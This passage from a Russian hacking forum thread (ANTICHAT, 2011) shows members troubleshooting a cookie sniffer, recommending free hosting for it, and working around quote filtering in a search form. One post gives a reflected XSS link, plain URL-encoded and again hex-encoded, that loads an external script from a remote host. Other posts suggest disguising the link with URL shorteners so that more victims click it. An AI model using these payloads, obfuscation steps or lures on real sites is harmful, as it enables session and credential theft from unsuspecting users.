HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 20.03.2011, 01:00
nicklayk
Новичок
Регистрация: 14.03.2011
Сообщений: 22
С нами: 7981526

Репутация: 0
По умолчанию

M@Z@XAKEP, вы уверены что config в вашем сниффере правилен?
Просто когда я вхожу на сайт ввожу логин и пароль прописанный в конфиге, меня всё время перекидывает на форму ввода логина и пароля, не знаю даже что делать.
 
Ответить с цитированием

  #112  
Старый 20.03.2011, 01:00
maxarr
Постоянный
Регистрация: 22.09.2010
Сообщений: 331
С нами: 8230646

Репутация: 145
По умолчанию

Там всё правильно)
Похоже что-то не так прописано у тебя..Если перекидывает, значит не соответствует логин или пасс, или всё вместе.)
 
Ответить с цитированием

  #113  
Старый 20.03.2011, 01:00
nicklayk
Новичок
Регистрация: 14.03.2011
Сообщений: 22
С нами: 7981526

Репутация: 0
По умолчанию

Что у меня может быть не так?
 
Ответить с цитированием

  #114  
Старый 26.03.2011, 01:00
[H]acke[R]
Участник форума
Регистрация: 11.03.2011
Сообщений: 182
С нами: 7985846

Репутация: 5
По умолчанию

IMAGE http://s41.radikal.ru/i094/1103/4a/3865370e38a0.jpg

Как быть?
 
Ответить с цитированием

  #115  
Старый 26.03.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

[H]acke[R], ставить в начале твоего кода не одинарную, а двойную кавычку.
 
Ответить с цитированием

  #116  
Старый 26.03.2011, 01:00
[H]acke[R]
Участник форума
Регистрация: 11.03.2011
Сообщений: 182
С нами: 7985846

Репутация: 5
По умолчанию

Цитата:

Сообщение от M@ZAX@KEP

[H]acke[R], ставить в начале твоего кода не одинарную, а двойную кавычку.

" фильтрует.
 
Ответить с цитированием

  #117  
Старый 27.03.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Так я ничего не скажу. Это надо видеть твою формочку поиска и её исходный код. И потыкать разными способами, поэкспериментировать. Например, каким образом фильтрует двойную кавычку? Отбрасывает или заменяет другим символом?
 
Ответить с цитированием

  #118  
Старый 12.04.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Обожемой, удалили... печальбида, тоскаобида. Оригинал тут.

Тот пост тоже подправил, спасибо.
 
Ответить с цитированием

  #119  
Старый 12.04.2011, 01:00
[H]acke[R]
Участник форума
Регистрация: 11.03.2011
Сообщений: 182
С нами: 7985846

Репутация: 5
По умолчанию

Цитата:

Сообщение от lagranj

а бесплатный хостинг для снифера посоветуете актуальный?

holm.ru

Добавлено через 1 минуту

Цитата:

Сообщение от M@ZAX@KEP

Так я ничего не скажу. Это надо видеть твою формочку поиска и её исходный код. И потыкать разными способами, поэкспериментировать. Например, каким образом фильтрует двойную кавычку? Отбрасывает или заменяет другим символом?

HTML highlight

Код:
alert()" name="search"/>
Добавлено через 17 минут

Цитата:


Способ 3: кодируем в url ядовитую часть ссылки. Кодировать можно тут. Получим ссылку такого вида:

Цитата:


httр://site.com/index.php?page=%3CSCRIPT%20type%3Dtext%2Fjavascrip t%20src%3Dhttp% 3A%2F%2Fhttpz.ru%2Fg4cuwl48edgo.js%3E%3C%2FSCRIPT% 3E%22



Кодировать лучше тут
Было :

PHP highlight

Код:
Код:
http://site.com/index.php?page=" 


Стало:

code:

http://site.com/index.php?page=%3C%53%43%52%49%50%54%20%74%79%70%6 5%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74% 20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%74%74%70%7A %2E%72%75%2F%67%34%63%75%77%6C%34%38%65%64%67%6F%2 E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%22
 
Ответить с цитированием

  #120  
Старый 12.04.2011, 01:00
narviss
Новичок
Регистрация: 01.08.2010
Сообщений: 8
С нами: 8305526

Репутация: 0
По умолчанию

Цитата:

Сообщение от M@ZAX@KEP

Способ 1: топаем на tinyurl.com и вбиваем туда нашу ссылку. Получаем в результате другую... короткую и загадочную :wink: А результат её работы - тот же :banana:

xD лучше уже вместо tinyurl.com, сокращать ссылки на лохе

Больше ведь народу поверят, и ссылка начинается с loh.ru и будет интересно вообще, кто там, что про тя написал =)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.